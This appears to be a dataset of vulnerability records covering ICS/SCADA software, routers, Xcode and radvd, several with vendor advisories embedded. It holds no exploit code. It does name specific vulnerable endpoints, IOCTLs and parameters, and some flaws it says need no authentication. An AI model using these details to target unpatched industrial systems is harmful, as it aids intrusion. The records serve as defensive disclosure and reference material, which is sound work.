var-202007-0395	Advantech iView, versions 5.6 and prior, contains multiple SQL injection vulnerabilities that are vulnerable to the use of an attacker-controlled string in the construction of SQL queries. An attacker could extract user credentials, read or modify information, and remotely execute code. Advantech iView Has SQL An injection vulnerability exists.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put in a state. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Advantech iView. Authentication is not required to exploit this vulnerability.The specific flaw exists within the NetworkServlet servlet. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise
var-201805-1147	WPLSoft in Delta Electronics versions 2.45.0 and prior utilizes a fixed length heap buffer where a value larger than the buffer can be read from a file into the buffer, causing the buffer to be overwritten, which may allow remote code execution or cause the application to crash. Delta Electronics WPLSoft Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Delta Industrial Automation WPLSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of dvp files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the current process. Delta Industrial Automation is the industry automation vendor for power management and cooling solutions worldwide. The length of the data provided by the user is not verified. WPLSoft (Delta PLC programming software) is a PLC program programming software used by Delta Electronics in the WINDOWS operating system environment. Delta Electronics WPLSoft has a heap buffer overflow vulnerability. Execute or cause the application to crash. A stack-based buffer-overflow vulnerability 2. A heap-based buffer-overflow vulnerability 3. Delta Industrial WPLSoft Version 2.45.0 and prior versions are vulnerable
var-201902-0647	LCDS Laquis SCADA prior to version 4.1.0.4150 allows execution of script code by opening a specially crafted report format file. This may allow remote code execution, data exfiltration, or cause a system crash. Script embedded in a crafted file can create files in arbitrary locations using the Ini.WriteString method. This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of LAquis SCADA Software. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the processing of the Memory.Integer method. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the aq process. LAquis SCADA is a suite of SCADA software for monitoring and data acquisition
var-201908-0863	Rockwell Automation Arena Simulation Software versions 16.00.00 and earlier contain a USE AFTER FREE CWE-416. A maliciously crafted Arena file opened by an unsuspecting user may result in the application crashing or the execution of arbitrary code. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the processing of project files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. 9502-Ax) 16.00.00 and earlier versions have resource management error vulnerabilities. 9502-Ax) version 16.00.00 and earlier
var-201912-0120	A memory corruption issue was addressed with improved validation. This issue is fixed in Xcode 11.2. Processing a maliciously crafted file may lead to arbitrary code execution. apple's Xcode Exists in an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Apple Xcode is an integrated development environment provided by Apple (Apple) to developers. It is mainly used to develop applications for Mac OS X and iOS. LLVM (Low Level Virtual Machine) is a framework system of a framework compiler (compiler) developed by the LLVM team. A security vulnerability exists in LLVM components in versions of Apple Xcode prior to 11.2. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 APPLE-SA-2019-11-01-1 Xcode 11.2 Xcode 11.2 addresses the following: llvm Available for: macOS Mojave 10.14.4 and later Impact: Processing a maliciously crafted file may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved validation. CVE-2019-8800: Pan ZhenPeng of Qihoo 360 Nirvan Team CVE-2019-8806: Pan ZhenPeng of Qihoo 360 Nirvan Team Installation note: Xcode 11.2 may be obtained from: https://developer.apple.com/xcode/downloads/ To check that the Xcode has been updated: * Select Xcode in the menu bar * Select About Xcode * The version after applying this update will be "11.2". Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- iQIzBAEBCAAdFiEEM5FaaFRjww9EJgvRBz4uGe3y0M0FAl27tlwACgkQBz4uGe3y 0M3xfA/6Ar1hsMVC9/i7vbHnKFv1nSo5k3dgl3t6UepPM2HW7YR9ngxKXW6r95DB hH9TELVnvluC15EfXbsB+OhcgIxCc8EJYvAs4Y+n34VL/A03WyIDaYB7/TO8NLaL Wh5O7/unhEijj+HhTiveS6x7Fimyw7WzVmLJvIoAN8EBXtvfWTA/VywAgHuX/aVB 2fdMOHDsVUI3a8SBzTSiHs6BM27TCoKx+FI3Ad+yABmxj+SykCfDcFOtxsyFhiBh m6fIPweMxXtKc3tZPQYLtu05UPoBlOclNiAbBt5I7jdd9uNekjLQFaMf+D+gGGZI BIILI1dCg+dQeDKPeMJsdSpcMqqyUvGfTzYW7JNQsGM1LFvS+8e7SLoCKJuIgosK dMkuK/kg05vOGgq6qFyGn/vDDXqoVpbFq+HN6tNU5i0ni8Y5vuE8ecttUJA6XTiA fF7U6AeSxQov5HS9RW8UzyCUktpPtiRuUYr3QWRpEoPsuWiPqvEprHe0FS+tJh3h Zkz42DV8gD5gogakX1oJpX+CTZa725WusiuFs0bdCkougssrGYaRnMe+YL7/Z6ej pAvNOGe4GesS0COGxkXgFK0w6VIC+SGVNdXkCudaYS+C4rklclVmXulKTavldUos D7ebNEuHgE2/H66H0A1zZf4YDP4KqVb/j2T15wiA4uYiU67jN94= =KAxM -----END PGP SIGNATURE-----
var-201912-0114	A memory corruption issue was addressed with improved validation. This issue is fixed in Xcode 11.2. Processing a maliciously crafted file may lead to arbitrary code execution. apple's Xcode Exists in an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Apple Xcode is an integrated development environment provided by Apple (Apple) to developers. It is mainly used to develop applications for Mac OS X and iOS. A security vulnerability exists in LLVM components in versions of Apple Xcode prior to 11.2. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 APPLE-SA-2019-11-01-1 Xcode 11.2 Xcode 11.2 addresses the following: llvm Available for: macOS Mojave 10.14.4 and later Impact: Processing a maliciously crafted file may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved validation. CVE-2019-8800: Pan ZhenPeng of Qihoo 360 Nirvan Team CVE-2019-8806: Pan ZhenPeng of Qihoo 360 Nirvan Team Installation note: Xcode 11.2 may be obtained from: https://developer.apple.com/xcode/downloads/ To check that the Xcode has been updated: * Select Xcode in the menu bar * Select About Xcode * The version after applying this update will be "11.2". Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- iQIzBAEBCAAdFiEEM5FaaFRjww9EJgvRBz4uGe3y0M0FAl27tlwACgkQBz4uGe3y 0M3xfA/6Ar1hsMVC9/i7vbHnKFv1nSo5k3dgl3t6UepPM2HW7YR9ngxKXW6r95DB hH9TELVnvluC15EfXbsB+OhcgIxCc8EJYvAs4Y+n34VL/A03WyIDaYB7/TO8NLaL Wh5O7/unhEijj+HhTiveS6x7Fimyw7WzVmLJvIoAN8EBXtvfWTA/VywAgHuX/aVB 2fdMOHDsVUI3a8SBzTSiHs6BM27TCoKx+FI3Ad+yABmxj+SykCfDcFOtxsyFhiBh m6fIPweMxXtKc3tZPQYLtu05UPoBlOclNiAbBt5I7jdd9uNekjLQFaMf+D+gGGZI BIILI1dCg+dQeDKPeMJsdSpcMqqyUvGfTzYW7JNQsGM1LFvS+8e7SLoCKJuIgosK dMkuK/kg05vOGgq6qFyGn/vDDXqoVpbFq+HN6tNU5i0ni8Y5vuE8ecttUJA6XTiA fF7U6AeSxQov5HS9RW8UzyCUktpPtiRuUYr3QWRpEoPsuWiPqvEprHe0FS+tJh3h Zkz42DV8gD5gogakX1oJpX+CTZa725WusiuFs0bdCkougssrGYaRnMe+YL7/Z6ej pAvNOGe4GesS0COGxkXgFK0w6VIC+SGVNdXkCudaYS+C4rklclVmXulKTavldUos D7ebNEuHgE2/H66H0A1zZf4YDP4KqVb/j2T15wiA4uYiU67jN94= =KAxM -----END PGP SIGNATURE-----
var-202305-1589	D-Link DIR-2150 SetSysEmailSettings EmailTo Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-2150 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the SOAP API interface, which listens on TCP port 80 by default. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20559. D-Link DIR-2150 is a wireless router from D-Link, a Chinese company
var-202407-0235	Delta Electronics CNCSoft-G2 lacks proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. If a target visits a malicious page or opens a malicious file an attacker can leverage this vulnerability to execute code in the context of the current process. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. Delta Electronics CNCSoft-G2 is a human-machine interface (HMI) software from Delta Electronics, a Chinese company
var-202407-0234	Delta Electronics CNCSoft-G2 lacks proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. If a target visits a malicious page or opens a malicious file an attacker can leverage this vulnerability to execute code in the context of the current process. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. Delta Electronics CNCSoft-G2 is a human-machine interface (HMI) software from Delta Electronics, a Chinese company
var-202407-0233	Delta Electronics CNCSoft-G2 lacks proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. If a target visits a malicious page or opens a malicious file an attacker can leverage this vulnerability to execute code in the context of the current process. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. Delta Electronics CNCSoft-G2 is a human-machine interface (HMI) software from Delta Electronics, a Chinese company
var-202407-0232	Delta Electronics CNCSoft-G2 lacks proper validation of user-supplied data, which can result in a memory corruption condition. If a target visits a malicious page or opens a malicious file an attacker can leverage this vulnerability to execute code in the context of the current process. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. Delta Electronics CNCSoft-G2 is a human-machine interface (HMI) software from Delta Electronics, a Chinese company
var-201112-0097	Stack-based buffer overflow in the CmpWebServer component in 3S CoDeSys 3.4 SP4 Patch 2 and earlier, as used on the ABB AC500 PLC and possibly other products, allows remote attackers to execute arbitrary code via a long URI to TCP port 8080. CoDeSys is a powerful PLC software programming tool that supports IEC61131-3 standard IL, ST, FBD, LD, CFC, SFC six PLC programming languages. The GatewayService has an integer overflow. The GatewayService uses the 32-bit value offset at the header 0x0c to specify the size of the received data. The program receives this value, increasing the number of 0x34 and allocating the amount of memory can cause an integer overflow. CmpWebServer is a component of the 3SRTESrv3 and CoDeSysControlService services for handling 8080 port connections. The function 0040f480 copies the input URI to a limited stack buffer, which can trigger a buffer overflow. 3S CoDeSys handles the Content-Length value in an HTTP POST request to trigger a null pointer reference. CoDeSys is prone to a stack-based buffer-overflow and an integer-overflow vulnerability. Failed attacks may cause a denial-of-service condition
var-201801-0152	An Untrusted Pointer Dereference issue was discovered in Advantech WebAccess versions prior to 8.3. There are multiple vulnerabilities that may allow an attacker to cause the program to use an invalid memory address, resulting in a program crash. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x27eb IOCTL in the webvrpcs process. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A denial of service vulnerability exists in versions prior to Advantech WebAccess 8.3
var-201801-0151	A Stack-based Buffer Overflow issue was discovered in Advantech WebAccess versions prior to 8.3. There are multiple instances of a vulnerability that allows too much data to be written to a location on the stack. Advantech WebAccess Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the parsing of the command line in the bwprtscr utility. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment
var-201807-0341	ABB Panel Builder 800 all versions has an improper input validation vulnerability which may allow an attacker to insert and run arbitrary code on a computer where the affected product is used. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of the IPAddress parameters of the ABB BEControlLogix OPC Driver. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code under the context of an administrator. ABB Panel Builder 800 is a web-based HMI (Human Machine Interface) system from ABB, Switzerland
var-201806-1058	Crestron TSW-1060, TSW-760, TSW-560, TSW-1060-NC, TSW-760-NC, and TSW-560-NC devices before 2.001.0037.001 allow unauthenticated remote code execution via a Bash shell service in Crestron Toolbox Protocol (CTP). This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Crestron's Android-based products. Authentication is required to exploit this vulnerability.The specific flaw exists within the ADDUSER command of the CTP console. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker could leverage this vulnerability to execute code with root privileges. CrestronTSW-1060 and other are touch screen devices of Crestron Electronics of the United States. There are security vulnerabilities in several Crestron products
var-201906-1029	In WebAccess/SCADA Versions 8.3.5 and prior, multiple untrusted pointer dereference vulnerabilities may allow a remote attacker to execute arbitrary code. WebAccess/SCADA Is NULL A vulnerability related to pointer dereference exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the 0x2776 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess/SCADA is a browser-based SCADA software from Advantech, Taiwan. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess/SCADA is prone to the following security vulnerabilities: 1. A directory-traversal vulnerability 2. Multiple stack-based buffer-overflow vulnerabilities 3. Multiple heap-based buffer-overflow vulnerabilities 4. An information disclosure vulnerability 5. Multiple remote-code execution vulnerabilities An attacker can exploit these issues to execute arbitrary code in the context of the application, modify and delete files, use directory-traversal sequences (â??../â??) to retrieve arbitrary files, escalate privileges and perform certain unauthorized actions or obtain sensitive information. This may aid in further attacks. Advantech WebAccess/SCADA Versions 8.3.5 and prior versions are vulnerable. This vulnerability stems from improper design or implementation problems in the code development process of network systems or products
var-202004-0077	There are multiple ways an unauthenticated attacker could perform SQL injection on WebAccess/NMS (versions prior to 3.0.2) to gain access to sensitive information. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Advantech WebAccess/NMS. Authentication is not required to exploit this vulnerability.The specific flaw exists within the processing of calls to the handleTargetsByDeviceName method of the MibBrowser class. When parsing the deviceName parameter of the targets endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to disclose file contents in the context of SYSTEM. Advantech WebAccess/NMS is a set of Web browser-based Network Management System (NMS) software package developed by China Taiwan Advantech Corporation. There is a SQL injection vulnerability in Advantech WebAccess/NMS versions earlier than 3.0.2
var-202206-2050	The affected product is vulnerable to multiple SQL injections, which may allow an unauthorized attacker to disclose information. Authentication is not required to exploit this vulnerability.The specific flaw exists within the NetworkServlet endpoint, which listens on TCP port 8080 by default. When parsing the PROP_GetCommunity and PROP_SetCommunity elements of the performSearchDevice action, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise
var-202305-1981	D-Link DIR-2150 SetSysEmailSettings AccountName Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-2150 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the SOAP API interface, which listens on TCP port 80 by default. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20555. D-Link DIR-2150 is a wireless router from D-Link, a Chinese company
var-202305-0214	D-Link DIR-2640 HNAP LoginPassword Authentication Bypass Vulnerability. This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of D-Link DIR-2640 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web management interface, which listens on TCP port 80 by default. A specially crafted login request can cause authentication to succeed without providing proper credentials. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-19549. D-Link DIR-2640 is a high-power Wi-Fi router from China's D-Link
var-202305-0130	D-Link DIR-2640 EmailFrom Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-2640 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the handling of the EmailFrom parameter provided to the HNAP1 endpoint. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-19550. D-Link DIR-2640 is a high-power Wi-Fi router from China's D-Link
var-202407-0441	A vulnerability has been identified in SIMATIC PCS 7 V9.1 (All versions), SIMATIC WinCC Runtime Professional V18 (All versions), SIMATIC WinCC Runtime Professional V19 (All versions < V19 Update 2), SIMATIC WinCC V7.4 (All versions < V7.4 SP1 Update 23), SIMATIC WinCC V7.5 (All versions < V7.5 SP2 Update 17), SIMATIC WinCC V8.0 (All versions < V8.0 Update 5). The affected products do not properly handle certain requests to their web application, which may lead to the leak of privileged information. This could allow an unauthenticated remote attacker to retrieve information such as users and passwords. Siemens SIMATIC PCS 7 is a process control system from Siemens, Germany. SIMATIC WinCC is an automated supervisory control and data acquisition (SCADA) system. SIMATIC WinCC Runtime Professional is a visual runtime platform for operators to control and monitor machines and equipment
var-201105-0156	Multiple buffer overflows in the ISSymbol ActiveX control in ISSymbol.ocx 61.6.0.0 and 301.1009.2904.0 in the ISSymbol virtual machine, as distributed in Advantech Studio 6.1 SP6 61.6.01.05, InduSoft Web Studio before 7.0+SP1, and InduSoft Thin Client 7.0, allow remote attackers to execute arbitrary code via a long (1) InternationalOrder, (2) InternationalSeparator, or (3) LogFileName property value; or (4) a long bstrFileName argument to the OpenScreen method. Overly long to method bstrFileName argument. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Indusoft Thin Client. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within ISSymbol.ocx ActiveX component. When an overly large string is passed as the 'InternationalOrder' parameter, a heap overflow occurs. This vulnerability can be leveraged to execute code under the context of the user running the browser. InduSoft Web Studio is a powerful and complete graphics control software that includes the various functional modules required to develop Human Machine Interface (HMI), Management Control, Data Acquisition System (SCADA) and embedded control. The Advantech Studio ISSymbol ActiveX control handles boundary errors in the \"InternationalSeparator\" property. The Advantech Studio ISSymbol ActiveX control is prone to multiple buffer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied input. Failed exploit attempts will likely result in denial-of-service conditions. Advantech Studio 6.1 SP6 Build 61.6.01.05 is vulnerable; other versions may also be affected. There are multiple buffer overflow vulnerabilities in InduSoft ISSymbol ActiveX control 6.1 SP6 Build 61.6.01.05 (ISSymbol.ocx 61.6.0.0) and other versions. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ZDI-12-168 : InduSoft Thin Client ISSymbol InternationalSeparator Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-168 August 29, 2012 - -- CVE ID: CVE-2011-0340 - -- CVSS: 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P - -- Affected Vendors: Indusoft - -- Affected Products: Indusoft WebStudio - -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 12446. - -- Vendor Response: Indusoft has issued an update to correct this vulnerability. More details can be found at: http://www.indusoft.com/hotfixes/hotfixes.php - -- Disclosure Timeline: 2011-12-19 - Vulnerability reported to vendor 2012-08-29 - Coordinated public release of advisory - -- Credit: This vulnerability was discovered by: * Alexander Gavrun - -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 10.2.0 (Build 1950) Charset: utf-8 wsBVAwUBUD4cZ1VtgMGTo1scAQJoagf/ZpDTiahOQlERNABRglBe8krgQHhSHddX qVTQjFEyoOL8df5cA/I3JLJxEYRzcT0k8FSdoHUAMDWA8Oxv1BB62r7fgHC1BFjp jbH6u0mL+eYd95jqwfYaruakhABiCRR73nCxYvYGb1Bvx6piBDneD9E+Nx+qycF5 HKb5Fr0wwT+sWssIsnAHx5jDUamdRyQfOR1MAzb6GfKWDsRqwr/T5hWvRLqbZ3Cj VXwmd+MIIAQZIMJ8swKgBvbSeV4tcePun1NhqJYAJtySYR6a6oF112Gk+kXlNXDi EvynyGSXvzLMKEd+vmzSBbVeftCxNQJ8Ce4Vg+LYMGk0YHfoupt3gQ== =Fw26 -----END PGP SIGNATURE-----
var-201402-0028	The process_rs function in the router advertisement daemon (radvd) before 1.8.2, when UnicastOnly is enabled, allows remote attackers to cause a denial of service (temporary service hang) via a large number of ND_ROUTER_SOLICIT requests. radvd is prone to the follow security vulnerabilities: 1. Multiple local privilege-escalation vulnerability. 2. A local arbitrary file-overwrite vulnerability. 3. Multiple remote denial-of-service vulnerabilities. An attacker can exploit these issues to execute arbitrary code with administrative privileges, overwrite arbitrary files, and cause denial-of-service conditions. The software can replace IPv6 routing for stateless address auto-configuration. An input validation vulnerability exists in the 'process_rs' function in radvd 1.8.1 and earlier. ========================================================================== Ubuntu Security Notice USN-1257-1 November 10, 2011 radvd vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 11.10 - Ubuntu 11.04 - Ubuntu 10.10 - Ubuntu 10.04 LTS Summary: radvd could be made to crash or overwrite certain files if it received specially crafted network traffic. Software Description: - radvd: Router Advertisement Daemon Details: Vasiliy Kulikov discovered that radvd incorrectly parsed the ND_OPT_DNSSL_INFORMATION option. The default compiler options for affected releases should reduce the vulnerability to a denial of service. This issue only affected Ubuntu 11.04 and 11.10. (CVE-2011-3601) Vasiliy Kulikov discovered that radvd incorrectly filtered interface names when creating certain files. (CVE-2011-3602) Vasiliy Kulikov discovered that radvd incorrectly handled certain lengths. (CVE-2011-3604) Vasiliy Kulikov discovered that radvd incorrectly handled delays when used in unicast mode, which is not the default in Ubuntu. (CVE-2011-3605) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 11.10: radvd 1:1.8-1ubuntu0.1 Ubuntu 11.04: radvd 1:1.7-1ubuntu0.1 Ubuntu 10.10: radvd 1:1.6-1ubuntu0.1 Ubuntu 10.04 LTS: radvd 1:1.3-1.1ubuntu0.1 In general, a standard system update will make all the necessary changes. References: http://www.ubuntu.com/usn/usn-1257-1 CVE-2011-3601, CVE-2011-3602, CVE-2011-3604, CVE-2011-3605 Package Information: https://launchpad.net/ubuntu/+source/radvd/1:1.8-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.7-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.6-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.3-1.1ubuntu0.1 . ---------------------------------------------------------------------- Secunia is hiring! Find your next job here: http://secunia.com/company/jobs/ ---------------------------------------------------------------------- TITLE: Gentoo update for radvd SECUNIA ADVISORY ID: SA46930 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46930/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46930 RELEASE DATE: 2011-11-21 DISCUSS ADVISORY: http://secunia.com/advisories/46930/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/46930/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=46930 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Gentoo has issued an update for radvd. For more information: SA46200 SOLUTION: Update to "net-misc/radvd-1.8.2" or later. ORIGINAL ADVISORY: GLSA 201111-08: http://www.gentoo.org/security/en/glsa/glsa-201111-08.xml OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: radvd: Multiple vulnerabilities Date: November 20, 2011 Bugs: #385967 ID: 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in radvd which could potentially lead to privilege escalation, data loss, or a Denial of Service. Background ========== radvd is an IPv6 router advertisement daemon for Linux and BSD. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-misc/radvd < 1.8.2 >= 1.8.2 Description =========== Multiple vulnerabilities have been discovered in radvd. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All radvd users should upgrade to the latest stable version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/radvd-1.8.2" References ========== [ 1 ] CVE-2011-3601 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3601 [ 2 ] CVE-2011-3602 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3602 [ 3 ] CVE-2011-3603 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3603 [ 4 ] CVE-2011-3604 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3604 [ 5 ] CVE-2011-3605 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3605 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201111-08.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2011 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2323-1 security@debian.org http://www.debian.org/security/ Yves-Alexis Perez October 26, 2011 http://www.debian.org/security/faq - ------------------------------------------------------------------------- Package : radvd Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2011-3602 CVE-2011-3604 CVE-2011-3605 Debian Bug : 644614 Multiple security issues were discovered by Vasiliy Kulikov in radvd, an IPv6 Router Advertisement daemon: CVE-2011-3602 set_interface_var() function doesn't check the interface name, which is chosen by an unprivileged user. CVE-2011-3604 process_ra() function lacks multiple buffer length checks which could lead to memory reads outside the stack, causing a crash of the daemon. CVE-2011-3605 process_rs() function calls mdelay() (a function to wait for a defined time) unconditionnally when running in unicast-only mode. As this call is in the main thread, that means all request processing is delayed (for a time up to MAX_RA_DELAY_TIME, 500 ms by default). Note: upstream and Debian default is to use anycast mode. For the oldstable distribution (lenny), this problem has been fixed in version 